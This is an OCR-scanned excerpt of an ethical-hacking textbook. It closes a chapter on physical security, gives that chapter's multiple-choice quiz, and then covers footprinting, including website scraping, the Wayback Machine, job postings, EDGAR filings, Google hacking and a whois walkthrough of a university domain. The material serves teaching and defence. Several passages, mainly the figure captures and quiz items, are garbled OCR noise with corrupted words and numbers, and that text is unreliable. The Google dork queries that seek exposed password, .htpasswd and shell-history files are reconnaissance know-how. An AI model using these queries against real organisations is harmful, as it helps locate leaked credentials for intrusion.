considered a potential I easy access and should be secured if greater than 96 square inches.

The third layer of physical defense is the interior controls: locks, safes* containers,
cabinets, interior lighting, It can even include policies and procedures that cover what
controls arc placed on computers, I tiptops, equipment and storage media. This third layer
of defense is important when you consider items such as the data center or any servers
kept onsite. A well-placed data center should not be above the second floor of a facility
because a fire might in tike it inaccessible. Likewise, you wouldn’t want the data center
located in the basement because it could be subject to flooding. A we 1 1 -placed data center
should have limited accessibility — typically no more than two doors. Keep these items

This chapter is unique in that so much of ethical hacking and penetration testing
is about IT and networks. However, the reality is that attackers will target an
organisation any way that they can. Not all attacks will be logical in nature: many
are physical. II’ attackers can gain physical access to a facility, many potentially
damaging actions can occur: from simply unplugging a server and walking out
with it to sniffing traffic on the network.

Physical controls can take many forms and be implemented lor any number of
reasons. Consider that physical controls such as doors, fences, and gates represent
some of the first barriers that an attacker will encounter. When constructed and
placed properly, fences can provide a tremendous security benefit, stopping all but
the most determined attacker. Other types of controls that can be layered into the
existing physical security system include alarm and intrusion detection systems,
both of which provide an early warning of intrusions.

CHAPTER SUMMARY

KEY CONCEPTS AND TERMS

Biometrics

Bluetooth

Bollard

False acceptance rate (FAR)

False rejection rate [F RR)

Lock

Turnstile

104 PART 1 Hacker Techniques and Too Is

CHAPTER 4 ASSESSMENT

1. Physical security Is less Important than Logical
security

A, True

B. False

1. is a common physical control that

can be used as both a detective and reactive took

A, A Fence

B, An alarm
e CCTV

II A lock

1. For a fence to deter a determined intruder ,
it should be at least feel tall.

A. Four
U. Five

C, Six
\1 Ten

1. A{n) is used to prevent cars from

ramming a building.

1. While guards, and dogs arc both good for physical
security, which of Ihe following more commonly
applies to dogs?

A, Liability

B, Discernment
C Dual role

D Multifunction

1. YVhul tinide of lock would be appropriate
to protect a critical business asset?

1. defines the camera’s effectiveness

In viewing objects from a horizontal and
vertical view.

A. Granularity

B. Ability to zoom

C. Field of view
D Focal length

JJ. In the field of IT security, the concept
of defense in depth Is layering more than
one control on another.

A. True

B. False

1. is an intrusion detection system

used exclusively in conjunction with fences

A. Infrared wave patter

B. .Motion de lector

C. RF1D
0. F1DAS

1. A Type 2 error is also known as what?

A. False rejection rate

B. Failure rate

C. Crossover error rate
ft. False acceptance rate

1. Which type of biometrlc system is frequently
found on laptops?

A. Retina

B. Fingerprint

C. Iris

Dl Voice recognition

1. What do luck pick scls typically contain
at a minimum?

A. Tension wrenches and drivers

B. A pick

C. A pick and a driver

D. A pick and a tension wrench

1. During an assessment you discovered that
the target company was using a fax machine.
Which of the following is I lie h’usi important:

A. The phone number is publicly available.

B. The fax machine is in an open, unsecured
area.

C. Faxes frequently sit in the printer tray.

D. The tax machine uses a ribbon.

PART TWO

A Technical Overview

of Hacking

C

C

chapter 5 Footprinting Tools and Techniques 106

chapter e Port Scanning 137

chapter 7 j Enumeration and Computer

System Hacking 159

chapter a Wireless Vulnerabilities 186

chapter 9 Web and Database Attacks 209

CHAPTER 10 Ma I ware, Worms, and Viruses 232
CHAPTER 11 Trojans and Backdoors 252

CHAPTER 12

Sniffers, Session Hijacking, and
Denial of Service Attacks 276

CHAPTER 13 Linux, Live CDs, and Automated

Assessment Tools 299

Foot printing Tools and Techniques

WHEN THINKING ABOUT HACKING into systems, you might think that
hackers simply use a few software tools to gain access to the target.
Although it is true that there are a multitude of tools available
to facilitate this very action, effective hacking is a process that takes place
in phases. Each phase in the hacking process should be undertaken with
the goal of uncovering increasingly useful information about a target that
can be used in the eventual break-in.

The first phase of hacking is the footprinting phase, which is specifically
designed to passively gain information about a target. If done correctly and
patiently it is possible for skilled attackers to gain valuable information about
their intended target without alerting the victim to the impending attack.
Information that is possible to gain during this phase can be somewhat
surprising because it is possible to obtain information such as network range,
equipment/technologies in use, financial information, locations, physical
assets, and employee names and titles. A typical company generates a wealth
of information as a byproduct of its operations, and such information can
be used for any purpose that an attacker may have in mind.

In this chapter, the process that hackers use will be introduced along
with the techniques that are used during each step of the process. An
understanding of the techniques that hackers use will provide valuable insight
into not just the mechanics of the process but also how to thwart them in
the real world. In this chapter, special emphasis will be placed upon the first
of the phases: footprinting.

Chapter 5 Topics

This chapter covers the following topics and concepts:

What the information-gathering process entails

• What type of information can be found on an organization’s Web site

• How attackers discover financial information
■ What the nature of Google hacking is

• How to explore domain information leakage

• How to track an organization’s employees

• How insecure applications are exploited
How to use some basic counter measures

Chapter S Goals

When you complete this chapter, you will be able to:

• State the purpose of footprinting

List the types of information typically found on an organization’s Web site

• Identify sources on the World Wide Web used for footprinting
S h o w h o w atta eke rs m a p o r g a n i za t o n s

• Describe the types of information that can be found about an organization’s
key employees

• List examples of unsecured application used by organizations

The Information-Gathering Process

Although this chapter will place emphasis on the footprinting phase of the hacking
and information-gathering process, seven steps are actually used. The steps of the
in formation -gathering process include:

1. Gathering information
• Determining the network range

• Identifying active machines

• Fin din g ope n po rts an d acces s points

• 5 . D etec 1 1 n ii o p c ra ling systems

108

PART 2 A Technical Overview of Hacking

1. Using Qngerp ri nting serv ices
• M Eipping the network

• Of the seven steps, footprinting covers the lirst two steps in the process. Note that steps 1
and 2 are both passive in nature; they do not require direct interaction with the victim.
This is one of the key characteristics of footprinting; to gather inform tit ion about a victim
without directly interacting and potentially providing advance notice of the atlack.
The following list shows some of the activities an attacker can perform when footpri nting
an organisation:

• Examine the company’s Web site

• Idenlify key employees

• A na lyz e o pen positions and ] o b req uest s

• Assess affiliate, parent, or sister companies

• Find technologies and software used by the organization

• Determine network address and range

• Review network range to determine whether the organization is the owner
or if the systems are hosted by someone else

» Look for employee postings, blogs, and other leaked information

• Review collected dtita

Under the right conditions, a skilled hacker can gather the information mentioned here
and use the results to fine-tune what will be scanned or probed on the victim. Remember
that the most effective tools that can be employed during this phase are common sense
and detective work. You must be able to look for the places where a company may have
made information available and seek such information, In fact, footpri nting may be the
easiest part of the h tic king process because most organisations generate massive amounts
of information that is made available online. Before a skilled hacker fires up an active
tool, such as a port scanner or password cracker, he or she will meticulously carry out
the footpri nting process to plan and coordinate a more effective attack.

The Information on a Company Web Site

When starting the foot printing phase, do not overlook some of the more obvious sources
of information, including the company’s Web site. As anyone who has used the Internet
can attest. Web sites offer various amounts of information about an organization because
the Website has been published to tell customers about the organization. Although
Web sites contain much less sensitive data now than was seen in the pEist, it is still not
uncommon to come across Web sites that contain e-mail addresses, employee names,
branch office Locations, and technologies the organization uses. An example of an average
Web site and some information you might find is shown in Figure 5-1 .

One problem with Web sites that has only recently been overcome is the amount
of sensitive Information that can be accessed by the public, Sometimes without even
realizing it, a company will publish a piece of information that seems insignificant,

CHAPTER 5 Footprinting Tools and Technique

109

Superior Sviu fitmy
Mission Statement

FIGURE 1-1

Company management.

L

I Supefw Sol/Oore, ttea

mti>erk swrtlf Cffwltnq
Ffrti. Oj «rvC« include
, jjflrtlr Jtcn to I rig, network

AxirtE. and ojb jwsft, »cvrtr

Mrfl^ iffifltf pill. sfcSLrrt*

ba»ic*. *xl product rtjtaJijitin

At toirlt; *rplrbs rd hatb’tfi
irfilBPwbri, *8 teach cur cvstowni

tie tE aaorrty produce and sbtyicss r
fie fflarto$rl»ft Our gpal * to h « or ojvt&TTVE bacam SKurrty iwat U SO^KCnS, N :>.i n . r :wi -. .-r i I Vjpitjt: J? Sfflifiwl tr>’ all ma£r ccfnu-w iwoas; ttmallovrt usuu ci f ImjwIfHty* n<Xl 4 Jls fT^k* fi>j *-4h rrA pjv! a wUhn but 4 ftferibr BLpartr SakjUnS, Inc. htobMn frctrirrj V (ustnmer Hn« for ekman TW* [ At cflic u 1v apunri crt ti 1WJ . Oir frewr sbfl members ara uniftjfcted r rtw knofcfcjLj?. t>prf bJC of ther rurd le i'”HJ e>periwe ;a*ie *t resul of reart of hljfcjy tf»:uJn»d wrrk Mid cmCKt with thcuundi of paqib. Cur ma’iigefli&n caarn nckdte launder Jrtd Cligf IJrHjraCkiq trfflfW j^t faiepp – (ha S»ef cr SoluDani , He, fcxrtter i buWng r H ! svturtff uUan tS dr t-j s-T dtoyt 0^ vxr*rx W4 j c^lierswcur hj 1 fl^pufi facmssd on IT ns**wta warty nwetmanfe. Em tmutfi bedng the firm rcrturrw* a larg* amount err Mr. Creagfc tut*, I* artp^s «3 , ng. r. hsi * proven rpp^on fini ? Ceramic jnd liflymbil ipeJ*r . His FTi^tn wrrfe n hr fiokt of IT soever rcLxkr thsp rxbiCdtKn of sbulBoi security boc+–s ho “-a >: cht* ajiftx ed w ca-ArthgracL •romr* al trr-vr trtfcre nebcin : i=^ngrpa:’s Hid’ S» 5)Wt Src f”s SKtf^r S«tSt:# i3L“i f.’K? 1 c?*!-j J r Hxf&r &&mft*p i. Ha iko ehj+p>« 4&rii Abftmswt Shuj^ jf-=dff.7i^ro>’ iflinrs pubiomt it U yw aw NHwih Sscut^ ub »t Wiley and Tte C£/WmS ttt/tatiati Sat&ny Mr. Gregg- boWs *sax <tec#e«, i iMd-elci V w. jri£3 j lustnr’r dag’Ki. Otrtiness Devdapfliem Otreetw but to an att ticker that same information may be gold. Consider u practice that used to be quite common: the posting of com p tiny directories on the company Web site. Such information mtiy not seem like a problem except that it gives an at t ticker valuable contact information for employees that may be used to impersonate these individuals. Of course, what is valuable is not just what is visible on a Web site; it can also be the source code or HTML that is used to design the site. Tt is possible for a particularly astute attacker to browse through the source code and locate comments or other pieces of information that can give insight into an organization. The following is an exam pic of HTML code with comments <html> <heatl > <tit!e>Company Web page</title> </head> <body> <!— This Web page prompts for the password to login to the database server HAL9000 -> </body> </html> 110 PART 2 A Technical Overview of Hacking NOTE Site ripping tools such as Black widow Pro or Wget can be used to extract a complete copy of the Web site. The comment included here may .seem harmless, but it would tell an attacker the name of the server that is being accessed, assisting in targeting an attack. Over the last decade, companies have gotten the message that posting some information on the company Web site is not ad vis ah le. In some cases, organizations have removed in formation that could reveal die tails about internal process, personnel, and other assets. On the surface, it would seem that once information is removed from a Web site the problem is eliminated, but this is far from true. In the case of a Web site, the state of a Weh site at a particular point in time may still exist somewhere out in cyberspace. One of the tools that a security professional can use to gain information ahout a past version of a Web site is something known as the W’ayback Machine. It is a Web application created by the Internet Archive that takes “snapshots’ 1 of a Weh site at regular intervals and makes them aval I ah le to anyone w r ho looks. With the Wayhack Machine, it is possible to recover information that w T as posted on a Web site sometime in the past. However, the information may be hopelessly out of date and of limited use. The Way back Machine is available at http’Jj http://www.archive.. org/. An example of this Web site is shown in Figure 5-2. When a Web site address is entered into the Wayhack Machine. the site will return a list of dates representing when a IVeb site was archived w T ith an asterisk next to any date on which a change was made. Although the Internet Archive does not keep exhaustive results on every Web site, the Web sites it does archive can stretch all the way back to 199ft. Currently the Internet Archive has a sizable amount of content cataloged estimated to be in excess of li>fl billion Web pages and related content. Of note in the Internet Archive is the fact that every Web site on the Internet is not archived, and those that are may not always go back far enough to reveal any useful information. Another potential drawback Ls that a site administrator, through use of a lile called robots. bet, can block the Internet Archive from making snapshots of the site, denying anyone the use of old information. Figure 5-3 shows an example of how far back Web pages go for a specific company. NOTE The Internet ArchFve is intended to be a historical archive of trie Internet for the purposes of research arid historical interests. Originally started in 1996, the I nternet Arch ive has grown to include the archived versions of more than 150 billion Web pages; the archive has since been enhanced to include text, video r and images and other content. f Web 15Q billion pJij)M IGURE 5-2 Way back Machine query. CHAPTER 5 Footprinting Tools and Techniques 111 Results ror Jan 01. 1995 ifcjjfijail Ajl1G_20Q1 * esq*! ■”J ™ EH 2001 ii win ana ■ Aug D$. ZM5

,.. I i

» a™ ‘
joJi^XU ■

Oct L1J2KB *
VEUiV’,’.,

wwiH. am

ft*t Cl MtP
&mn am

t»i ir. 1 -: »
iw >t mm *

in p»gtP

tf» a m* ‘

L3.I3CM *
fr[ ri.aai –

-TbL*.3it>S. *
Fit “S JDS

Mr:* m’
MPT it APS *

■bnlTI ^TTlfi ■

V.J J l.Jt.*2

frij ?\ xr>=

■OrHh.aK

JW.3L3S’

Jjn2l.J0or •

.’ju ill JBI *

A,r, -t, an? *

Balm
-i;.i:.:o:r

g^, ib. -ynr
ten]’ 3flOT

Q-LIO? XTH T

oam aw
m in., amy
g.iJilJBK

Maj ?j jttfl

FIGURE 5 3

Wayback Machine results.

Of course, the Internet Archive is only one source from which valuable information
can be gleaned about tin intended target; tin other valuable source is job postings.
Consider that the job postings a company posts on the corporate Web site or on job boards
can give valuable clues into what the infrastructure they use looks like. IT should take
note of the skills being requested when examining job postings, paying special interest
to the skills section, For example, consider the following posting:

Expertise Required:

• Advanced knowledge of Microsoft XF, 7, Server 200 5; and products such as
Microsoft Access, Microsoft SQL Server, Microsoft HSvf>. Visual Basic
• Proficient in Excel, Word, and PowerPoint 2007

• Re levant Experien ce / K now le d ge C isco PIX : Ch ec kpo i n t F i re wa 11 h elp fu 1
but not necessary

• Virtual Machine (VMWare), SAP $4F, and other data-gathering systems • Although this is only a snippet of a larger job posting, it still provides insight into what the company happens to be using. Think for a moment how an attacker can make use of the information the company provided. As an example, the attacker could use the information to attempt to fine tune a later attack, doing some research and locating vulnerabilities such as: • Search for vulnerabilities in the discovered products ■ Scan for application specific configuration issues • Locate product specific defects • 112 PART 2 A Technical Overview of Hacking pMOTE When a company posts a job on a corporate site or a job posting site such as dice.com or monster.com, care should be taken to sanitize the posting. A company that is thinking ahead may either choose to be less specific on skills or remove Information that easily identifies the company in question. Sanitizing seeks to clean up or strip out sensitive information that may be too sensitive or too revealing. If Lhc attacker can successfully use any of the.se attacks, it is ei simple matter to access the target’s network and do further harm. On the other hand, if the at t ticker rinds that these vulner- abilities Eire patched, the posting still provides information on other software in use and insight into the environment. Another gem of information that can be useful in job postings is job location. When browsing a job posting, the location information, when browsed in conjunction with skills, can yield insight into potential activities at a location. When browsing job postings, the appearance of unusual skills at a specific location can bean indicator of activities such as those associated with research and development. An attacker could use the information to target specific locations that are more likely to contain assets of value. Discovering Financial Information It is not surprising that an ever-increasing number of attacks are financially motivated in nature. Criminals htive discovered that technology can be a new and very effective way of committing old scams on a new medium. For example, consider Albert Gonzales, the hacker convicted of the T| Maxx hacking attack. According to httpJ hvww.’mformatiomveek, com > Mr. Gonzales did not pick his targets at random. CISCO SYSTEMS IMC CIHJ; 0MMEW7T [sea all camp any filings) SIC Xtt<- COMPUTER COWHUMCAHONB EQUIPMENT SlalR iKfton £A| Slain oflre t* |FlscalVar&iq1 0735 4kMte1ani Dfcwlsr Wtc» No 3] ■ivlmiktai Ii-jns .idiom lur’.’iiutaxiJur 5 1 ferchHr irjui-octwn* Tor Piis i apwlmg twntf . flier Re* ulls rn ^lar WiClWUMDOl 0 MM! © MM O Vtr flBma.1 – 40 EjRSSfesd Fib i Fihiil-H SC 13G S-B S-ff CFAMllA *k iZXmM tHitHit **5n- b»n fsci»l Ow(rShi0 ty .no*edu« Am-po crjoiD3fi36l-10-(WTi hits Soe 15K3 Set unlet Id be- Dlfantf Do employes* ¥\ enipfw? bane Is plan 5. Arc-no 0001 133 1 1S-Q9-K9.379 (33 Arfl SUA. 333 kH Stt im**4 to h* affrifi b5tmplWflri trtifl«febtrtlil(ilni Arena IHH)il«iIi>U K«T8(3Ji33 Star US KB Set urtes Id b« nfargr- to emol wes <n smct^?e t)pr (ii plan s Atf-no 0rj01193II5-ri9-M8a):i(33Ar{i BtM 05 IS Cb<rntipe<t; Ham B C i Arena 000l1«l JS.0*?4.35b6 (34 AdJ Sta 14KB Atfd*anai diflnibvi picrrzdirft ng mttiitfiltd bif niifipminijiiPinrwid Pull U(i)<13) material A«-ng DDCH193H^D-Jllli3q» 1J*B 0V aridity report; [Sedipns 1 5 i r 1 J( J}| Art-flO 0Q011S3liM».?3TCi«(34 Air) S12B § MS Cl t*- rt report, HBirti I 1)1 . 6.01 , and D DI A«.ng C90li«il^9*-J3B3S(34 Arq SUs 4<(kB (L-wntiwpon; namU {11, J 03, and Q Jl AK-n* CIM11»3I2VD9-23J44)5(34 Axfl Sfifl: »T KH [fliit«HKl]Cun«nip»p«t, Ban S.QZ Att-no Cfl01l93i2Srrj9 ?3aj«f .;34 AT3 Sl2a. 14 13 FIGURE 5 4 Cisco EDGAR 10 Q. CHAPTER 5 Footprinting Tools and Techniques 113 The Value of Footprinting How important is footprinting? According to the Information Security Forum (ISF) r profit-driven attacks have largely replaced those of the lone wolf hacker. These new attackers rely or careful footprinting to determine and select suitable targets. Groups of organized criminal hackers have even been known to place bogus employees within organizations to provide inside knowledge that can be used to more effectively carry out an attack. This new mode of attack is designed to steal valuable and sensitive information or customer data for financial gain and profit. Although not unheard of, such crimes are rarely carried out by one person; these attacks are typically the work of criminal networks that bring together specialist skills and expertise. Targets were footprinted prior to being attacked: the footprinting process was specifically used to determine whether a targeted company made enough money to merit an attack. TJ Ma xx is only one of the ever- in creasing numbers of victims of cy here rime, numbers that are expected to increase as criminals adopt new methods and technologies. It is no surprise that the criminal element is quite often attracted to the prospect of monetary gain, and cybercrime is no exception. When a criminal is choosing a company to attack based on whether that company makes enough money, items such as publicly available financial records can prove vital. In the United States, getting information on the financial health of companies is easy because financial records on publicly traded companies are available for review. These financial records are easily accessible throu gh the Securities and Exchange Commission (SEC) Web site at http:ffvvww.sec.gov. On the Web site, it is possible to review the Electronic Data Gathering, Analysis, and Retrieval system (EDGAR) database, which contains all sorts of financial information (some updated daily i All foreign and domestic companies that are publicly traded are legally required to tile registrEition statements, periodic reports, and other forms electronically through EDGAR, all of which can be browsed by the public. Of particular interest in the EDGAR database are the items known as the 10-Qs and 10-Ks. These items arc quarterly and yearly reports that contain the names, addresses, financial data, and Information about acquired or divested industries. For example, a search of the EDGAR database for information about Cisco returns the list of records shown in Figure 5-4. Closer examination of these records indicates where the company is based, detailed financial information, and the names of the principals, such as the president and members of the board, EDGAR is not the only source of this information, however; other sites provide similar types of information, including the following: ■ Hoovers — h t tp:/ / w ww. hoove rs. com / Dun and Bradstreet — http:ffivww.dnb.cam/iis/ • Bloomb erg — h t tp:/ / www. bloom be rg. com / 114 PART 2 A Technical Overview of Hacking rC m [ One of the major reasons why Google hacking is so effective is the large amount of information any given company generates. Statistically, the average company tends to double the amount of data it possesses every 18 months during normal operations. If a company were to take only a small fraction of that information and make it accessible from the Internet, it would be potentially releasing a large amount of information into the world around it. Google Hacking The previous two methods demonstrated simple but powerful tools that can be used to gain information about a target. The methods both showed how they can be used in unintended and new ways to gain information. One more tool that can be used in ways never really intended is Google, Google contains a tremendous amoun t of information of all types just waiting to be searched and uncovered. In a process known as Google hacking, the goal is to locate useful information using techniques already provided by the search engine in new ways. If you can construct the proper queries, Google search results can provide hacker useful data about a targeted company. Google is only one search engine; other search engines, such as Yahoo and Bing> are also vulnerable to being used and abused in this way. Why is Google hacking effective? Quite simply it is because Google indexes vast amounts of information in untold numbers of formats. Google obviously can index Web pages like any search engine. But Google can also index images, videos, discussion group postings, and all sorts of file types such as .pdf, ,ppt and more. All the inform tit ion that Google, or any search engine, gathers is held in large databcises that are designed to be searchable; you only need to know how to look. There are numerous resources about the process of Google hacking, but one of the best is Johnny Long’s Google Hacking Database (CI IDE) at h t tp : i i w w w. hackersforch aritij. org / gkdbf. This site offers insight into some of the ways an attacker can easily find exploitable targets and sensiliw daia by using Google’s built-in functionality. An example of what is found at the Web site is seen in Figure 5-5. The GIIDB is merely a database of queries that identifies sensitive data and content that potentially may be of a sensitive nature. Some of the items an attacker can find are available using the following techniques: • Advisories and server vulnerabilities ■ Error messages that contain too much information • Files c on t a i n i n g p as s wo r d s • Sensitive directories • Pages con t a in i n g logon por ta Is • Pages con t a ini n g n el wo rk or vu I n erabilit y d at a • CHAPTER 5 Footprinting Tools and Technique 115 We Ice me to the Go ogje Hacking Del* bate (GUDB}! We call idem ‘gacofe’dorks’ Inept or foolish people as regaled by Googf a Wiatevesr you call ‘Jim b fooli, yoirVe found the c«i1« of Ihe Goog/e Hack: no. UniersB 3 Slop hf our fonima 1o sn where the- maox Happen ! AjjmoriH end Vuhirabf iti*$ (215 *\mny

These searches locate ifWierafcte sews Ti»s* seaiehes a* often getieiaied from
Wf»u* secutity adwscjry posit, and in many cases ate proAict flf •rtrsiofrf pacific

Error Mei-sagei JB8 #4i!Meg]

Really retarded error massages thai say WAY Cod muctif

FilflS COAtalntfifg juity into f230 «nuv«^)

Mo ufantun** or pjstrtedt. but irtl»itlmg tluf noiw IS* lets

Files containing us smarnas !’■*”■ °nlr«-s)

These file-s. contain userramK, tart im pasfcwiHds. .. SMI, gaoqle fndmg usenoanies
on a w«b sit?..

FwthoHfc (2i entnw)

Examples gr qu«rie$(hjl can hajp a hacker gain a fooihold mco a web <«rvsr Pages containing login portals p 31′ Etilns-s] These are login pages fervanous sennces Consider [ham 1he frcnl door gf a wab&ae’a incira ge-iwiw* fonaiona. Pages containing network orwlnwabilily data (6$ entires)

The 5* p^gei Contain Swth things 34 fnwal lag^ homypot lOflS. network

information, FDS J)S … a| wrltflf fon stufl

■E.frriSrtnrt Dire-ClQniS 1,61 Cpr¥ltl«^)

Ge&oja’s tolled a* of wefc sites tnannj sensdhe directories The files eontameci In
heie will vary from iesllwe eo uber-secretl

sensitive Online Shopping Info (9 enlitei)

EKamjiles. of queries lhal can reveal online shopping info Isfce customer data,
EUFPf’er*. orders, credited numb* s, credit camf info, elc

VanCiri OnVie Devices ehhies}

This- category co-nlains thing s like pnrters. wfleo tcrnerae. and all sons of cool
things found on 1 h* web wflh Go ogle

Vume-rtble Files $7 enlr^s) HUNDREDS ofvuliwiable files that Goog/!g can And on websles \AjM1tTbl SltWt enlnti) These March** 14 ai sewets win spactft wiwr46ties These f iir«l m a difergmt way than 1h staidm found m the “Vulnerable Files’ SKten Web Server Deledw (?2 tmt*) These link* demonstrate Geogle’s awesome y to pnjSe wet-$*t**r&

What makes this possible is the way in which
information is Indexed by a search engine.
Specific commands such as intitle instruct
Google to search for a term wilhin the title
of a document. Some examples of intitle search
strings are shown here:

■ intitle: “index of
intitle: “index of

. bash_hi story
i inances. xls

• intitle: “index . of
intitle: “index of” htpasswd

• intitle: “Index of” inuil :maillog

The keyword “intitle:” directs Google to search
for and return pages which contain the words
listed after the intitle: keyword. For example
intitle: “index of” finance. xls will return pages
that contain files of the name finance.xls.

Once these results are returned the attacker can
browse the results looking for those that contain
sensitive or restricted information that may reveal

Another popular search parameter IsjUetype,
This query allows the search to look for a
particular term only within a specific filetype.
A few examples of the use of this search string
are as follows:

f iletype:bak inurl :” ht. access I passwd

• f iletype:conf slapd.conf

filetype:ctt “msn”

f iletype:mdb inurl : “account I users

• file type: xls inurl : “email .xls”

FIGURE 5-5

The keyword “filetype:” instructs Google to return liles that have specific extensions.
For example. filelype:doc or iilelypejxls will return all the word or excei documents.

To better understand the actual mechanics of this type of attack, a closer examination
is necessary With this type of attack an attacker will need some knowledge ahead of time,
such as the information gathered from a job posting regarding applications. The attacker
can then determine that a company is hosting a Web server and further details such as

116 PART 2 A Technical Overview of Hacking

W*b ffl Saow^WQftt Wpj J6 1 10 Cf atCM 3.120 V Hmirlrw«.«f “M-CliCfeftJISyS.O 8«iw ft ,JD2i secant

-: wrr.-*. : pH]etfOSpr.2W)T mo ::r>; :*c»v<i?.4ar.2aw 1839 .

iwwt teptafKW^bi&Mii.CiMr – Cat had • StrTifer

FIGURE 5 6

the type and version I for example. Microsoft IIS 6,0), An attacker can then use this
knowledge to perform a search to uncover whether the company is actually running
the Web serve]’ version in question. For example, the attacker may have chosen to
attack Cisco and as such will need to locate the Web servers that are running ILS 61)
to move their attack to the next phase. Using Google to find Weh servers that are running
Microsoft IIS f>.0 servers can be accom plished with a simple Google query such as
“in title: index. of “Microsof t-I IS/6.0 Server at H on the Google search page.
The results ;>l this search are shown in Figure 5 -ft. NolicelhEU more than 2.0l)i) hils
were returned.

A final search query that can prove Invatutihle is the Google keyword imtrL The inurl
string is used to search within a site’s uniform resource locator CURL). This is very useful
if some knowledge of URL strings or with standard URL strings used by different types
of applications and systems is possessed. Some common inurl searches include the
following:

• inurl : admin f i letype : db
• inurl : admin inurl :backup inti tie : index .of

• inurl: 1f auth_user_fi le. txt”

• inurl : 1 7axs/ax- admin . pi” -script
inurl : “/ cricket/ graph er . cgi”

• The keyword “inurl:” commands Google to return pages which include specific words
or characters in the URL. For example, the search request inurl:hyrule will produce
such pages that have the word “hyrule” in it.

These search queries and variations are very powerful in form at ion -gathering
mechanisms that can reveal information that may not be so obvious or accessible
normally. Gaining a careful understanding of each search term and key word can allow
a potential attacker to gain information about a target that may otherwise be out of
view. The security professional who wants to gain additional insight into how footprinting
using Google hacking works should experiment with each term and what it reveals.
Knowing how they are used by attackers can help prevent the wrong information ending
up in a Web search of your organization through the careful planning and securing
of data.

CHAPTER 5 Footprinting Tools and Techniques

Exploring Domain Information Leakage

117

A reality of developing security for tiny public organization is the fact that some
information is difficult or impossible to hide. A public company that wants to attract
customers must walk a tine line because some information by necessity will have to
be made public while other information can be kept secret. An example of information
that should be kept secret by any company is domain information, or the information
that is associated wilh the registration of an Internet domain, Currently many tools
are available that can be used for obtaining types of basic information, including these:

• Whois
• Ksiookup

• Interne t As signe d Nu mbers Autho rity ( IAN A} and Regional Internet Re gistri es
(RIRs) to find the range of Internet protocol (IP) addresses

• Trace route to determine the locEition of the network

Each of these tools can provide valuable information pulled from domain registration
information.

Manual Registrar Query

The Internet Corporation for Assigned Names and Numbers (ICANN) is the primary
body charged with management of IP address space allocation, protocol parameter
assignment, and domain name system management. Global domain name management
is delegated to the Internet Assigned Numbers Authority (IAN A), IAN A is responsible for the
global coordination of the Domain Name System (DNS) Root, IP addressing, and other
Internet protocol resources,

Root Zone Database

FIGURE 5-7

Th» Knot ‘ian% Dalabj** rnprffSMfil 5 |h« H«lHq^1»nn clrtailx pi Id|>Ippk doznasfis., ircludaig glTO-i such *$. ” CCW, and ciy.injry-ccn fo TL. D gucti as \UK L Ab th3 jnanaq ar of 1he DNS raol moe. LaMAis reasortaiblfi for c-aordmalir.inries celeqat.ans in secordarES <mh IE policies, and bujca du-is? Root Zone Database, Much of 1his d*a h also available- via tlte WHOIS protocol at whots.iana jr y Domain Tfoe Purpoas } SpMiswirtg Qrgaii is-at ion country-code AsCanswn Island Hrtwxr inTcrrtbsri Cferttr cC Doniari fao-Hn) cte Co « wd Wutnt (Awmtian Irtmd) m coAimry-tcide Marred A’-arj Envrsies. TdKaimnciion RegLMIary AiMhafy CIRAI AE.PO sponsored ResBwaS for memb*rs chlie air-transport industry Af cwilrirycpd* AfghanisUn AG country-code Arthgua and Ba.-buda UH5A Sc tool c4 Me-Jcr* 1 18 PART 2 A Technical Overview of Hacking FIGURE 5-3 Maine Servers EDU registration services. HflJI NSrlf# IP dc -tsfc-s” 192 5 6,30 aQCll:5Ca aSte £1:0:05:30 t.SnW ssrvBfi.RBt 192.2692,30 d.gillrf-ierijKS nBt 192.31.80.30 f glld-terwrt.nst 1. 12 94.30 195 35 51 .30 g.gl Id- er ars.net 192.42.93.30 l.flUd-aewirs.fiH. 192 41 Subdomain Information! URL Ear rfeitaftoiioti strvic**: hl’p VUHOIS S«rv>r: whnu iriunum idu fleece; teai ij^c^rw J50^’2-OS flvjg*&l^Hi>n tfste fgffi-OJ-Of. When the network range is determined manually, the best resource available lo make ibis happen is the [ANA Web site at the Root Zone Database page located at http://www .uina.org/doimuns/root/ di?/. The Root Zone Database represents the delegation details of top level domains (TLE)s)< including domains such as.com and country-code TLDs such as .us. As the manager of the DNS root zone, IAN A is responsible for coordinating these delegations in accordance with its staled policies and procedures. The Web site can be seen in Figure 5-7. To fully grasp the process of uncovering a domain name and its associated information, j i is best lo L-xaminu Liu- prut/ess sic-p hy step. In this example, a search lor http://www.smu .edti will be performed. Of course, the target in this scenario has already been set, but in the real process the target would be the entity to be attacked. After the target has been identified £in this case, http://wwniKmu.edu). move through the tist until EDU is located: ihen click thai pa Lit 4 . Tin- IUH Wen pa tic is shown in figure At this point, the registration services for the .edu domain are handled by http://www .edmause.editfediidomain. Once the registrant for ,edu domains has been identified, it is now possible to use the educause Web site at h t tp:/ / wh ois. cdu c.a use, net I and enter a query for http://ww w.smu.e du. The results of this query are shown in Figure 5-9. Because org ani nation and planning are essential skills for security professionals, make note of the information uncovered for later use. While the organization method that each individual uses is unique, consider an organization strategy similar to the matrix located in Table 5-1. table 5-1 Initial whois findings. DOMAIN NAME IP ADDRESS NETWORK RANGE DNS SERVER POINT OF CONTACT http://www.5mu.edu 1 29. 1 1 9.64. 1 0 129.119.64.10 Bruce Meikle CHAPTER 5 Footprinting Tools and Technique 119 Who is Lookup SMI.5 ECU Search tavulb*. huu Hamt: SHU. EDIT Sfcurt**in Kvh(idit l&iivtritty fltS Alrliti* trim -Ifch Flacx tailu, TK 7S27S-M62 UNITED KUTIS FIGURE 5-9 5MU query. mm r ..► Ivi “.<r.’ „■■- Jcj-jc A. Ma.ller i>i;;*ci:or d£ teiecoimmican: ioni Sc-i.tt tmrk’L IE 4T. ho ds.se rnivarsaty ballu* IK ?S27£-C3G1 UNITED STATES [ill*} 7t” 3 – 4l Z E J k taiil»rg m , *du Technical Ci rAn-rt : St. Bruce BiVl« Si . JfcCTOEk IfiQima r “iiLiQhitLtL H T.liodi.« Uiiuarsity files .i.iL±lii,* nr. Dtllu, IX ?i27S-M:#2 IWITID STATIS £lM*QStaU.-«[3U KPDITi’.aiFJ. E>L1 1SJ.115.C4. 10 IZJ.iH.S. 2 1Z3. 114. in. a F’OKiiin record activated: 3 1 -Aijtg- J: 967 ttaHli] raccrd J, art i.ip-lBt»d: US-fa&-I010 boiuin fxpif cs: 31–3ul- 2010 T-s deceraihe the cuerewe. ■ccr-mis^iMi ititMi of search at th.» US DepA.rT.BC nt of 1 due at ion Of tice of TDFtr.ecorutn.Ey Sduca^icn azcrndLtfltlon vaib site. Note that in a matter of a few clicks, it was possible to obtain very detailed information Eibout the target such as the IP address of the Web server. 